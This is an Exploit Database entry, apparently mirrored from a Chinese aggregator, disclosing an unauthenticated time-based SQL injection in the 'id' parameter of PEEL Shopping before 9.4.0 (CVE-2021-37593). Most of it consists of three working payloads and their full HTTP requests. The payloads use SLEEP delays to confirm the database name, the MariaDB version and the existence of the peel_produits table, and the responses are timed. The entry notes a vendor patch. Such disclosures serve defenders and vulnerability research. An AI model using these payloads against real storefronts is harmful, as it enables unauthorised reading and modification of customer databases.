PEEL Shopping 9.3.0 – ‘id’ Time-based SQL Injection

• Exploit Database
• 16 阅读

• 作者： faisalfs10x
  日期： 2021-07-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50142/

• # Exploit Title: PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection
  # Date: 2021-07-10
  # Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
  # Vendor Homepage: https://www.peel.fr
  # Software Link: https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_3_0.zip/download
  # Version: prior to 9.4.0
  # Tested on: Windows 10, XAMPP
  # Reference: https://github.com/advisto/peel-shopping/issues/3
  # CVE: CVE-2021-37593
  
  
  ################
  # Description#
  ################
  
  # PEEL Shopping is an eCommerce shopping cart application in PHP / MySQL which works on any hosting. Public user/guest (unauthenticated) can inject malicious SQL query in order to affect the execution of predefined SQL commands via the "id" parameter on the "/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]" endpoint. Upon successful of SQL injection attack, attacker can read sensitive data from the database or modify database data.
  
  
  #####################
  # PoC of detection#
  #####################
  
  1) Assumed peel-shopping_9_4_0 out of box installation database name is peel. This query will check if database() name like hex(%peel%) - it will delay for 7 seconds before redirect to homepage (http://localhost/peel-shopping_9_4_0/) that indicates TRUE SQL statement which mean the database name like "peel".
  
  PoC #1) param id - time-based SQLi
  Payload: (SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX)
  Request: The response duration = 418 bytes | 7,719 millis
  ========
  
  GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX) HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://localhost/peel-shopping_9_4_0/
  DNT: 1
  Connection: close
  Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
  Upgrade-Insecure-Requests: 1
  Sec-GPC: 1
  Cache-Control: max-age=0
  
  ---
  
  2) Assumed the web is using MariaDB database server - check if db_version like hex(%MariaDB%), it will delay for 5 seconds if TRUE.
  
  PoC #2) param id - time-based SQLi
  Payload: (SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX)
  Request: The response duration = 418 bytes | 5,112 millis
  ========
  
  GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX) HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://localhost/peel-shopping_9_4_0/
  DNT: 1
  Connection: close
  Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
  Upgrade-Insecure-Requests: 1
  Sec-GPC: 1
  Cache-Control: max-age=0
  
  ---
  
  3) By default, the database have a table name = peel_produits. This query will check if table_name peel_produits is exist, it will delay for 10 seconds if TRUE, else will redirect to homepage instantly.
  
  PoC #3) param id - time-based SQLi
  Payload: (SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX)
  Request: The response duration = 418 bytes | 10,140 millis
  ========
  
  GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX) HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://localhost/peel-shopping_9_4_0/
  DNT: 1
  Connection: close
  Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
  Upgrade-Insecure-Requests: 1
  Sec-GPC: 1
  Cache-Control: max-age=0
  
  ---
  
  # For more explaination, you can refer to the github issue on peel-shopping via https://github.com/advisto/peel-shopping/issues/3. 
  # The affected version is prior to 9.4.0. Now it is fixed on version 9.4.0.1
  # The vendor has released the latest patched version on 9.4.0.1 that is available for download from sourceforge.net[https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_4_0_1.zip/download]